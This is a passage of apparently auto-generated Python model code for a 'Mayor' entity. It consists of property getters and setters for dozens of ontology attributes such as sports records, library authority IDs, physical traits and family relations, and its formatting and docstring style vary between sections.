"""Sets the pole_position of this Mayor.
Description not available # noqa: E501
:param pole_position: The pole_position of this Mayor. # noqa: E501
:type: list[int]
"""
self._pole_position = pole_position
@property
def season_manager(self):
"""Gets the season_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The season_manager of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._season_manager
@season_manager.setter
def season_manager(self, season_manager):
"""Sets the season_manager of this Mayor.
Description not available # noqa: E501
:param season_manager: The season_manager of this Mayor. # noqa: E501
:type: list[str]
"""
self._season_manager = season_manager
@property
def killed_by(self):
"""Gets the killed_by of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The killed_by of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._killed_by
@killed_by.setter
def killed_by(self, killed_by):
"""Sets the killed_by of this Mayor.
Description not available # noqa: E501
:param killed_by: The killed_by of this Mayor. # noqa: E501
:type: list[str]
"""
self._killed_by = killed_by
@property
def blood_type(self):
"""Gets the blood_type of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The blood_type of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._blood_type
@blood_type.setter
def blood_type(self, blood_type):
"""Sets the blood_type of this Mayor.
Description not available # noqa: E501
:param blood_type: The blood_type of this Mayor. # noqa: E501
:type: list[object]
"""
self._blood_type = blood_type
@property
def continental_tournament(self):
"""Gets the continental_tournament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The continental_tournament of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._continental_tournament
@continental_tournament.setter
def continental_tournament(self, continental_tournament):
"""Sets the continental_tournament of this Mayor.
Description not available # noqa: E501
:param continental_tournament: The continental_tournament of this Mayor. # noqa: E501
:type: list[object]
"""
self._continental_tournament = continental_tournament
@property
def junior_years_end_year(self):
"""Gets the junior_years_end_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The junior_years_end_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._junior_years_end_year
@junior_years_end_year.setter
def junior_years_end_year(self, junior_years_end_year):
"""Sets the junior_years_end_year of this Mayor.
Description not available # noqa: E501
:param junior_years_end_year: The junior_years_end_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._junior_years_end_year = junior_years_end_year
@property
def political_function(self):
"""Gets the political_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The political_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._political_function
@political_function.setter
def political_function(self, political_function):
"""Sets the political_function of this Mayor.
Description not available # noqa: E501
:param political_function: The political_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._political_function = political_function
@property
def honours(self):
"""Gets the honours of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The honours of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._honours
@honours.setter
def honours(self, honours):
"""Sets the honours of this Mayor.
Description not available # noqa: E501
:param honours: The honours of this Mayor. # noqa: E501
:type: list[object]
"""
self._honours = honours
@property
def olympic_games(self):
"""Gets the olympic_games of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._olympic_games
@olympic_games.setter
def olympic_games(self, olympic_games):
"""Sets the olympic_games of this Mayor.
Description not available # noqa: E501
:param olympic_games: The olympic_games of this Mayor. # noqa: E501
:type: list[object]
"""
self._olympic_games = olympic_games
@property
def hair_color(self):
"""Gets the hair_color of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hair_color of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._hair_color
@hair_color.setter
def hair_color(self, hair_color):
"""Sets the hair_color of this Mayor.
Description not available # noqa: E501
:param hair_color: The hair_color of this Mayor. # noqa: E501
:type: list[object]
"""
self._hair_color = hair_color
@property
def foot(self):
"""Gets the foot of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The foot of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._foot
@foot.setter
def foot(self, foot):
"""Sets the foot of this Mayor.
Description not available # noqa: E501
:param foot: The foot of this Mayor. # noqa: E501
:type: list[str]
"""
self._foot = foot
@property
def measurements(self):
"""Gets the measurements of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The measurements of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._measurements
@measurements.setter
def measurements(self, measurements):
"""Sets the measurements of this Mayor.
Description not available # noqa: E501
:param measurements: The measurements of this Mayor. # noqa: E501
:type: list[str]
"""
self._measurements = measurements
@property
def hand(self):
"""Gets the hand of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hand of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._hand
@hand.setter
def hand(self, hand):
"""Sets the hand of this Mayor.
Description not available # noqa: E501
:param hand: The hand of this Mayor. # noqa: E501
:type: list[object]
"""
self._hand = hand
@property
def federation(self):
"""Gets the federation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The federation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._federation
@federation.setter
def federation(self, federation):
"""Sets the federation of this Mayor.
Description not available # noqa: E501
:param federation: The federation of this Mayor. # noqa: E501
:type: list[object]
"""
self._federation = federation
@property
def circumcised(self):
"""Gets the circumcised of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The circumcised of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._circumcised
@circumcised.setter
def circumcised(self, circumcised):
"""Sets the circumcised of this Mayor.
Description not available # noqa: E501
:param circumcised: The circumcised of this Mayor. # noqa: E501
:type: list[str]
"""
self._circumcised = circumcised
@property
def penis_length(self):
"""Gets the penis_length of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The penis_length of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._penis_length
@penis_length.setter
def penis_length(self, penis_length):
"""Sets the penis_length of this Mayor.
Description not available # noqa: E501
:param penis_length: The penis_length of this Mayor. # noqa: E501
:type: list[str]
"""
self._penis_length = penis_length
@property
def coemperor(self):
"""Gets the coemperor of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The coemperor of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._coemperor
@coemperor.setter
def coemperor(self, coemperor):
"""Sets the coemperor of this Mayor.
Description not available # noqa: E501
:param coemperor: The coemperor of this Mayor. # noqa: E501
:type: list[object]
"""
self._coemperor = coemperor
@property
def detractor(self):
"""Gets the detractor of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The detractor of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._detractor
@detractor.setter
def detractor(self, detractor):
"""Sets the detractor of this Mayor.
Description not available # noqa: E501
:param detractor: The detractor of this Mayor. # noqa: E501
:type: list[object]
"""
self._detractor = detractor
@property
def selibr_id(self):
"""Gets the selibr_id of this Mayor. # noqa: E501
Authority data from the National Library of Sweden # noqa: E501
:return: The selibr_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._selibr_id
@selibr_id.setter
def selibr_id(self, selibr_id):
"""Sets the selibr_id of this Mayor.
Authority data from the National Library of Sweden # noqa: E501
:param selibr_id: The selibr_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._selibr_id = selibr_id
@property
def danse_competition(self):
"""Gets the danse_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The danse_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._danse_competition
@danse_competition.setter
def danse_competition(self, danse_competition):
"""Sets the danse_competition of this Mayor.
Description not available # noqa: E501
:param danse_competition: The danse_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._danse_competition = danse_competition
@property
def sex(self):
"""Gets the sex of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sex of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sex
@sex.setter
def sex(self, sex):
"""Sets the sex of this Mayor.
Description not available # noqa: E501
:param sex: The sex of this Mayor. # noqa: E501
:type: list[str]
"""
self._sex = sex
@property
def sexual_orientation(self):
"""Gets the sexual_orientation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sexual_orientation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sexual_orientation
@sexual_orientation.setter
def sexual_orientation(self, sexual_orientation):
"""Sets the sexual_orientation of this Mayor.
Description not available # noqa: E501
:param sexual_orientation: The sexual_orientation of this Mayor. # noqa: E501
:type: list[object]
"""
self._sexual_orientation = sexual_orientation
@property
def partner(self):
"""Gets the partner of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The partner of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._partner
@partner.setter
def partner(self, partner):
"""Sets the partner of this Mayor.
Description not available # noqa: E501
:param partner: The partner of this Mayor. # noqa: E501
:type: list[object]
"""
self._partner = partner
@property
def birth_year(self):
"""Gets the birth_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_year
@birth_year.setter
def birth_year(self, birth_year):
"""Sets the birth_year of this Mayor.
Description not available # noqa: E501
:param birth_year: The birth_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_year = birth_year
@property
def sports_function(self):
"""Gets the sports_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sports_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sports_function
@sports_function.setter
def sports_function(self, sports_function):
"""Sets the sports_function of this Mayor.
Description not available # noqa: E501
:param sports_function: The sports_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._sports_function = sports_function
@property
def orcid_id(self):
"""Gets the orcid_id of this Mayor. # noqa: E501
Authority data on researchers, academics, etc. The ID range has been defined as a subset of the forthcoming ISNI range. # noqa: E501
:return: The orcid_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._orcid_id
@orcid_id.setter
def orcid_id(self, orcid_id):
"""Sets the orcid_id of this Mayor.
Authority data on researchers, academics, etc. The ID range has been defined as a subset of the forthcoming ISNI range. # noqa: E501
:param orcid_id: The orcid_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._orcid_id = orcid_id
@property
def election_date(self):
"""Gets the election_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The election_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._election_date
@election_date.setter
def election_date(self, election_date):
"""Sets the election_date of this Mayor.
Description not available # noqa: E501
:param election_date: The election_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._election_date = election_date
@property
def sport_discipline(self):
"""Gets the sport_discipline of this Mayor. # noqa: E501
the sport discipline the athlete practices, e.g. Diving, or that a board member of a sporting club is focussing at # noqa: E501
:return: The sport_discipline of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sport_discipline
@sport_discipline.setter
def sport_discipline(self, sport_discipline):
"""Sets the sport_discipline of this Mayor.
the sport discipline the athlete practices, e.g. Diving, or that a board member of a sporting club is focussing at # noqa: E501
:param sport_discipline: The sport_discipline of this Mayor. # noqa: E501
:type: list[object]
"""
self._sport_discipline = sport_discipline
@property
def collaboration(self):
    """The collaboration of this Mayor.

    :rtype: list[object]
    """
    return self._collaboration

@collaboration.setter
def collaboration(self, collaboration):
    """Store a new collaboration value (list[object])."""
    self._collaboration = collaboration

@property
def national_team_year(self):
    """The national_team_year of this Mayor.

    :rtype: list[str]
    """
    return self._national_team_year

@national_team_year.setter
def national_team_year(self, national_team_year):
    """Store a new national_team_year value (list[str])."""
    self._national_team_year = national_team_year

@property
def number_of_run(self):
    """The number_of_run of this Mayor.

    :rtype: list[int]
    """
    return self._number_of_run

@number_of_run.setter
def number_of_run(self, number_of_run):
    """Store a new number_of_run value (list[int])."""
    self._number_of_run = number_of_run

@property
def spouse_name(self):
    """The spouse_name of this Mayor.

    :rtype: list[str]
    """
    return self._spouse_name

@spouse_name.setter
def spouse_name(self, spouse_name):
    """Store a new spouse_name value (list[str])."""
    self._spouse_name = spouse_name

@property
def lah_hof(self):
    """The lah_hof of this Mayor.

    :rtype: list[str]
    """
    return self._lah_hof

@lah_hof.setter
def lah_hof(self, lah_hof):
    """Store a new lah_hof value (list[str])."""
    self._lah_hof = lah_hof

@property
def derived_word(self):
    """The derived_word of this Mayor.

    :rtype: list[str]
    """
    return self._derived_word

@derived_word.setter
def derived_word(self, derived_word):
    """Store a new derived_word value (list[str])."""
    self._derived_word = derived_word

@property
def current_team_manager(self):
    """The current_team_manager of this Mayor.

    :rtype: list[object]
    """
    return self._current_team_manager

@current_team_manager.setter
def current_team_manager(self, current_team_manager):
    """Store a new current_team_manager value (list[object])."""
    self._current_team_manager = current_team_manager

@property
def little_pool_record(self):
    """The little_pool_record of this Mayor.

    :rtype: list[str]
    """
    return self._little_pool_record

@little_pool_record.setter
def little_pool_record(self, little_pool_record):
    """Store a new little_pool_record value (list[str])."""
    self._little_pool_record = little_pool_record

@property
def bpn_id(self):
    """The bpn_id of this Mayor.

    Identifier from the Dutch project with material for 40,000 digitized
    biographies, including former colonies of the Netherlands.

    :rtype: list[str]
    """
    return self._bpn_id

@bpn_id.setter
def bpn_id(self, bpn_id):
    """Store a new bpn_id value (list[str]); see the getter for its meaning."""
    self._bpn_id = bpn_id

@property
def free_danse_score(self):
    """The free_danse_score of this Mayor.

    :rtype: list[str]
    """
    return self._free_danse_score

@free_danse_score.setter
def free_danse_score(self, free_danse_score):
    """Store a new free_danse_score value (list[str])."""
    self._free_danse_score = free_danse_score
@property
def project(self):
    """The project of this Mayor.

    :rtype: list[object]
    """
    return self._project

@project.setter
def project(self, project):
    """Store a new project value (list[object])."""
    self._project = project

@property
def active_years(self):
    """The active_years of this Mayor.

    :rtype: list[object]
    """
    return self._active_years

@active_years.setter
def active_years(self, active_years):
    """Store a new active_years value (list[object])."""
    self._active_years = active_years

@property
def title_date(self):
    """The title_date of this Mayor.

    :rtype: list[str]
    """
    return self._title_date

@title_date.setter
def title_date(self, title_date):
    """Store a new title_date value (list[str])."""
    self._title_date = title_date

@property
def blood_group(self):
    """The blood_group of this Mayor.

    :rtype: list[str]
    """
    return self._blood_group

@blood_group.setter
def blood_group(self, blood_group):
    """Store a new blood_group value (list[str])."""
    self._blood_group = blood_group

@property
def school(self):
    """The school of this Mayor.

    School a person goes or went to.

    :rtype: list[object]
    """
    return self._school

@school.setter
def school(self, school):
    """Store a new school value (list[object]): school a person goes or went to."""
    self._school = school

@property
def death_place(self):
    """The death_place of this Mayor.

    The place where they died.

    :rtype: list[object]
    """
    return self._death_place

@death_place.setter
def death_place(self, death_place):
    """Store a new death_place value (list[object]): the place where they died."""
    self._death_place = death_place

@property
def victory_percentage_as_mgr(self):
    """The victory_percentage_as_mgr of this Mayor.

    :rtype: list[float]
    """
    return self._victory_percentage_as_mgr

@victory_percentage_as_mgr.setter
def victory_percentage_as_mgr(self, victory_percentage_as_mgr):
    """Store a new victory_percentage_as_mgr value (list[float])."""
    self._victory_percentage_as_mgr = victory_percentage_as_mgr

@property
def imposed_danse_competition(self):
    """The imposed_danse_competition of this Mayor.

    :rtype: list[str]
    """
    return self._imposed_danse_competition

@imposed_danse_competition.setter
def imposed_danse_competition(self, imposed_danse_competition):
    """Store a new imposed_danse_competition value (list[str])."""
    self._imposed_danse_competition = imposed_danse_competition

@property
def shoot(self):
    """The shoot of this Mayor.

    :rtype: list[str]
    """
    return self._shoot

@shoot.setter
def shoot(self, shoot):
    """Store a new shoot value (list[str])."""
    self._shoot = shoot

@property
def education_place(self):
    """The education_place of this Mayor.

    :rtype: list[object]
    """
    return self._education_place

@education_place.setter
def education_place(self, education_place):
    """Store a new education_place value (list[object])."""
    self._education_place = education_place
@property
def match_point(self):
    """The match_point of this Mayor.

    :rtype: list[str]
    """
    return self._match_point

@match_point.setter
def match_point(self, match_point):
    """Store a new match_point value (list[str])."""
    self._match_point = match_point

@property
def reign_name(self):
    """The reign_name of this Mayor.

    :rtype: list[str]
    """
    return self._reign_name

@reign_name.setter
def reign_name(self, reign_name):
    """Store a new reign_name value (list[str])."""
    self._reign_name = reign_name

@property
def pro_period(self):
    """The pro_period of this Mayor.

    :rtype: list[str]
    """
    return self._pro_period

@pro_period.setter
def pro_period(self, pro_period):
    """Store a new pro_period value (list[str])."""
    self._pro_period = pro_period

@property
def influenced_by(self):
    """The influenced_by of this Mayor.

    :rtype: list[object]
    """
    return self._influenced_by

@influenced_by.setter
def influenced_by(self, influenced_by):
    """Store a new influenced_by value (list[object])."""
    self._influenced_by = influenced_by

@property
def nla_id(self):
    """The nla_id of this Mayor.

    NLA Trove's People and Organisation view allows the discovery of
    biographical and other contextual information about people and
    organisations. Search also available via VIAF.

    :rtype: list[str]
    """
    return self._nla_id

@nla_id.setter
def nla_id(self, nla_id):
    """Store a new nla_id value (list[str]); see the getter for its meaning."""
    self._nla_id = nla_id

@property
def cousurper(self):
    """The cousurper of this Mayor.

    :rtype: list[object]
    """
    return self._cousurper

@cousurper.setter
def cousurper(self, cousurper):
    """Store a new cousurper value (list[object])."""
    self._cousurper = cousurper

@property
def race_wins(self):
    """The race_wins of this Mayor.

    :rtype: list[int]
    """
    return self._race_wins

@race_wins.setter
def race_wins(self, race_wins):
    """Store a new race_wins value (list[int])."""
    self._race_wins = race_wins

@property
def world_tournament_bronze(self):
    """The world_tournament_bronze of this Mayor.

    :rtype: list[int]
    """
    return self._world_tournament_bronze

@world_tournament_bronze.setter
def world_tournament_bronze(self, world_tournament_bronze):
    """Store a new world_tournament_bronze value (list[int])."""
    self._world_tournament_bronze = world_tournament_bronze

@property
def jutsu(self):
    """The jutsu of this Mayor.

    :rtype: list[str]
    """
    return self._jutsu

@jutsu.setter
def jutsu(self, jutsu):
    """Store a new jutsu value (list[str])."""
    self._jutsu = jutsu

@property
def weight(self):
    """The weight of this Mayor.

    :rtype: list[object]
    """
    return self._weight

@weight.setter
def weight(self, weight):
    """Store a new weight value (list[object])."""
    self._weight = weight
@property
def other_media(self):
    """The other_media of this Mayor.

    :rtype: list[object]
    """
    return self._other_media

@other_media.setter
def other_media(self, other_media):
    """Store a new other_media value (list[object])."""
    self._other_media = other_media

@property
def alma_mater(self):
    """The alma_mater of this Mayor.

    Schools that they attended.

    :rtype: list[object]
    """
    return self._alma_mater

@alma_mater.setter
def alma_mater(self, alma_mater):
    """Store a new alma_mater value (list[object]): schools that they attended."""
    self._alma_mater = alma_mater

@property
def imposed_danse_score(self):
    """The imposed_danse_score of this Mayor.

    :rtype: list[str]
    """
    return self._imposed_danse_score

@imposed_danse_score.setter
def imposed_danse_score(self, imposed_danse_score):
    """Store a new imposed_danse_score value (list[str])."""
    self._imposed_danse_score = imposed_danse_score

@property
def known_for(self):
    """The known_for of this Mayor.

    :rtype: list[object]
    """
    return self._known_for

@known_for.setter
def known_for(self, known_for):
    """Store a new known_for value (list[object])."""
    self._known_for = known_for

@property
def big_pool_record(self):
    """The big_pool_record of this Mayor.

    :rtype: list[str]
    """
    return self._big_pool_record

@big_pool_record.setter
def big_pool_record(self, big_pool_record):
    """Store a new big_pool_record value (list[str])."""
    self._big_pool_record = big_pool_record

@property
def olympic_games_wins(self):
    """The olympic_games_wins of this Mayor.

    :rtype: list[str]
    """
    return self._olympic_games_wins

@olympic_games_wins.setter
def olympic_games_wins(self, olympic_games_wins):
    """Store a new olympic_games_wins value (list[str])."""
    self._olympic_games_wins = olympic_games_wins

@property
def eye_colour(self):
    """The eye_colour of this Mayor.

    :rtype: list[str]
    """
    return self._eye_colour

@eye_colour.setter
def eye_colour(self, eye_colour):
    """Store a new eye_colour value (list[str])."""
    self._eye_colour = eye_colour

@property
def world_tournament_silver(self):
    """The world_tournament_silver of this Mayor.

    :rtype: list[int]
    """
    return self._world_tournament_silver

@world_tournament_silver.setter
def world_tournament_silver(self, world_tournament_silver):
    """Store a new world_tournament_silver value (list[int])."""
    self._world_tournament_silver = world_tournament_silver

@property
def architectural_movement(self):
    """The architectural_movement of this Mayor.

    :rtype: list[str]
    """
    return self._architectural_movement

@architectural_movement.setter
def architectural_movement(self, architectural_movement):
    """Store a new architectural_movement value (list[str])."""
    self._architectural_movement = architectural_movement

@property
def mood(self):
    """The mood of this Mayor.

    :rtype: list[str]
    """
    return self._mood

@mood.setter
def mood(self, mood):
    """Store a new mood value (list[str])."""
    self._mood = mood
@property
def bibsys_id(self):
    """The bibsys_id of this Mayor.

    BIBSYS is a supplier of library and information systems for all
    Norwegian university Libraries, the National Library of Norway,
    college libraries, and a number of research libraries and institutions.

    :rtype: list[str]
    """
    return self._bibsys_id

@bibsys_id.setter
def bibsys_id(self, bibsys_id):
    """Store a new bibsys_id value (list[str]); see the getter for its meaning."""
    self._bibsys_id = bibsys_id

@property
def iihf_hof(self):
    """The iihf_hof of this Mayor.

    :rtype: list[str]
    """
    return self._iihf_hof

@iihf_hof.setter
def iihf_hof(self, iihf_hof):
    """Store a new iihf_hof value (list[str])."""
    self._iihf_hof = iihf_hof

@property
def free_prog_score(self):
    """The free_prog_score of this Mayor.

    :rtype: list[str]
    """
    return self._free_prog_score

@free_prog_score.setter
def free_prog_score(self, free_prog_score):
    """Store a new free_prog_score value (list[str])."""
    self._free_prog_score = free_prog_score

@property
def description(self):
    """The description of this Mayor.

    Small description.

    :rtype: list[str]
    """
    return self._description

@description.setter
def description(self, description):
    """Store a new description value (list[str]): small description."""
    self._description = description

@property
def particular_sign(self):
    """The particular_sign of this Mayor.

    :rtype: list[str]
    """
    return self._particular_sign

@particular_sign.setter
def particular_sign(self, particular_sign):
    """Store a new particular_sign value (list[str])."""
    self._particular_sign = particular_sign

@property
def league_manager(self):
    """The league_manager of this Mayor.

    :rtype: list[object]
    """
    return self._league_manager

@league_manager.setter
def league_manager(self, league_manager):
    """Store a new league_manager value (list[object])."""
    self._league_manager = league_manager

@property
def junior_season(self):
    """The junior_season of this Mayor.

    :rtype: list[object]
    """
    return self._junior_season

@junior_season.setter
def junior_season(self, junior_season):
    """Store a new junior_season value (list[object])."""
    self._junior_season = junior_season

@property
def free_prog_competition(self):
    """The free_prog_competition of this Mayor.

    :rtype: list[str]
    """
    return self._free_prog_competition

@free_prog_competition.setter
def free_prog_competition(self, free_prog_competition):
    """Store a new free_prog_competition value (list[str])."""
    self._free_prog_competition = free_prog_competition

@property
def weapon(self):
    """The weapon of this Mayor.

    :rtype: list[object]
    """
    return self._weapon

@weapon.setter
def weapon(self, weapon):
    """Store a new weapon value (list[object])."""
    self._weapon = weapon

@property
def kind_of_criminal(self):
    """The kind_of_criminal of this Mayor.

    :rtype: list[str]
    """
    return self._kind_of_criminal

@kind_of_criminal.setter
def kind_of_criminal(self, kind_of_criminal):
    """Store a new kind_of_criminal value (list[str])."""
    self._kind_of_criminal = kind_of_criminal
@property
def notable_idea(self):
    """The notable_idea of this Mayor.

    :rtype: list[object]
    """
    return self._notable_idea

@notable_idea.setter
def notable_idea(self, notable_idea):
    """Store a new notable_idea value (list[object])."""
    self._notable_idea = notable_idea

@property
def player_status(self):
    """The player_status of this Mayor.

    :rtype: list[str]
    """
    return self._player_status

@player_status.setter
def player_status(self, player_status):
    """Store a new player_status value (list[str])."""
    self._player_status = player_status

@property
def other_function(self):
    """The other_function of this Mayor.

    :rtype: list[object]
    """
    return self._other_function

@other_function.setter
def other_function(self, other_function):
    """Store a new other_function value (list[object])."""
    self._other_function = other_function

@property
def continental_tournament_silver(self):
    """The continental_tournament_silver of this Mayor.

    :rtype: list[int]
    """
    return self._continental_tournament_silver

@continental_tournament_silver.setter
def continental_tournament_silver(self, continental_tournament_silver):
    """Store a new continental_tournament_silver value (list[int])."""
    self._continental_tournament_silver = continental_tournament_silver

@property
def career_station(self):
    """The career_station of this Mayor.

    Links to a step in the career of a person, e.g. a soccer player,
    holding information on the time span, matches and goals he or she
    achieved at a club.

    :rtype: list[object]
    """
    return self._career_station

@career_station.setter
def career_station(self, career_station):
    """Store a new career_station value (list[object]); see the getter for its meaning."""
    self._career_station = career_station

@property
def resting_place_position(self):
    """The resting_place_position of this Mayor.

    :rtype: list[object]
    """
    return self._resting_place_position

@resting_place_position.setter
def resting_place_position(self, resting_place_position):
    """Store a new resting_place_position value (list[object])."""
    self._resting_place_position = resting_place_position

@property
def original_danse_competition(self):
    """The original_danse_competition of this Mayor.

    :rtype: list[str]
    """
    return self._original_danse_competition

@original_danse_competition.setter
def original_danse_competition(self, original_danse_competition):
    """Store a new original_danse_competition value (list[str])."""
    self._original_danse_competition = original_danse_competition

@property
def status_manager(self):
    """The status_manager of this Mayor.

    :rtype: list[str]
    """
    return self._status_manager

@status_manager.setter
def status_manager(self, status_manager):
    """Store a new status_manager value (list[str])."""
    self._status_manager = status_manager

@property
def national_tournament(self):
    """The national_tournament of this Mayor.

    :rtype: list[object]
    """
    return self._national_tournament

@national_tournament.setter
def national_tournament(self, national_tournament):
    """Store a new national_tournament value (list[object])."""
    self._national_tournament = national_tournament

@property
def hometown(self):
    """The hometown of this Mayor.

    :rtype: list[object]
    """
    return self._hometown

@hometown.setter
def hometown(self, hometown):
    """Store a new hometown value (list[object])."""
    self._hometown = hometown
@property
def dead_in_fight_place(self):
    """The dead_in_fight_place of this Mayor.

    :rtype: list[str]
    """
    return self._dead_in_fight_place

@dead_in_fight_place.setter
def dead_in_fight_place(self, dead_in_fight_place):
    """Store a new dead_in_fight_place value (list[str])."""
    self._dead_in_fight_place = dead_in_fight_place

@property
def continental_tournament_bronze(self):
    """The continental_tournament_bronze of this Mayor.

    :rtype: list[int]
    """
    return self._continental_tournament_bronze

@continental_tournament_bronze.setter
def continental_tournament_bronze(self, continental_tournament_bronze):
    """Store a new continental_tournament_bronze value (list[int])."""
    self._continental_tournament_bronze = continental_tournament_bronze

@property
def victory(self):
    """The victory of this Mayor.

    :rtype: list[int]
    """
    return self._victory

@victory.setter
def victory(self, victory):
    """Store a new victory value (list[int])."""
    self._victory = victory

@property
def complexion(self):
    """The complexion of this Mayor.

    :rtype: list[object]
    """
    return self._complexion

@complexion.setter
def complexion(self, complexion):
    """Store a new complexion value (list[object])."""
    self._complexion = complexion

@property
def citizenship(self):
    """The citizenship of this Mayor.

    :rtype: list[object]
    """
    return self._citizenship

@citizenship.setter
def citizenship(self, citizenship):
    """Store a new citizenship value (list[object])."""
    self._citizenship = citizenship

@property
def start(self):
    """The start of this Mayor.

    :rtype: list[int]
    """
    return self._start

@start.setter
def start(self, start):
    """Store a new start value (list[int])."""
    self._start = start

@property
def tessitura(self):
    """The tessitura of this Mayor.

    :rtype: list[str]
    """
    return self._tessitura

@tessitura.setter
def tessitura(self, tessitura):
    """Store a new tessitura value (list[str])."""
    self._tessitura = tessitura

@property
def start_career(self):
    """The start_career of this Mayor.

    :rtype: list[str]
    """
    return self._start_career

@start_career.setter
def start_career(self, start_career):
    """Store a new start_career value (list[str])."""
    self._start_career = start_career

@property
def label(self):
    """The label of this Mayor.

    Short description of the resource.

    :rtype: list[str]
    """
    return self._label

@label.setter
def label(self, label):
    """Store a new label value (list[str]): short description of the resource."""
    self._label = label
@property
def birth_date(self):
"""Gets the birth_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_date
@birth_date.setter
def birth_date(self, birth_date):
"""Sets the birth_date of this Mayor.
Description not available # noqa: E501
:param birth_date: The birth_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_date = birth_date
@property
def national_tournament_silver(self):
"""Gets the national_tournament_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._national_tournament_silver
@national_tournament_silver.setter
def national_tournament_silver(self, national_tournament_silver):
"""Sets the national_tournament_silver of this Mayor.
Description not available # noqa: E501
:param national_tournament_silver: The national_tournament_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._national_tournament_silver = national_tournament_silver
@property
def other_activity(self):
"""Gets the other_activity of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The other_activity of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._other_activity
@other_activity.setter
def other_activity(self, other_activity):
"""Sets the other_activity of this Mayor.
Description not available # noqa: E501
:param other_activity: The other_activity of this Mayor. # noqa: E501
:type: list[str]
"""
self._other_activity = other_activity
@property
def linguistics_tradition(self):
"""Gets the linguistics_tradition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The linguistics_tradition of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._linguistics_tradition
@linguistics_tradition.setter
def linguistics_tradition(self, linguistics_tradition):
"""Sets the linguistics_tradition of this Mayor.
Description not available # noqa: E501
:param linguistics_tradition: The linguistics_tradition of this Mayor. # noqa: E501
:type: list[object]
"""
self._linguistics_tradition = linguistics_tradition
@property
def national_tournament_bronze(self):
"""Gets the national_tournament_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._national_tournament_bronze
@national_tournament_bronze.setter
def national_tournament_bronze(self, national_tournament_bronze):
"""Sets the national_tournament_bronze of this Mayor.
Description not available # noqa: E501
:param national_tournament_bronze: The national_tournament_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._national_tournament_bronze = national_tournament_bronze
@property
def escalafon(self):
"""Gets the escalafon of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The escalafon of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._escalafon
@escalafon.setter
def escalafon(self, escalafon):
"""Sets the escalafon of this Mayor.
Description not available # noqa: E501
:param escalafon: The escalafon of this Mayor. # noqa: E501
:type: list[str]
"""
self._escalafon = escalafon
@property
def sibling(self):
"""Gets the sibling of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sibling of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sibling
@sibling.setter
def sibling(self, sibling):
"""Sets the sibling of this Mayor.
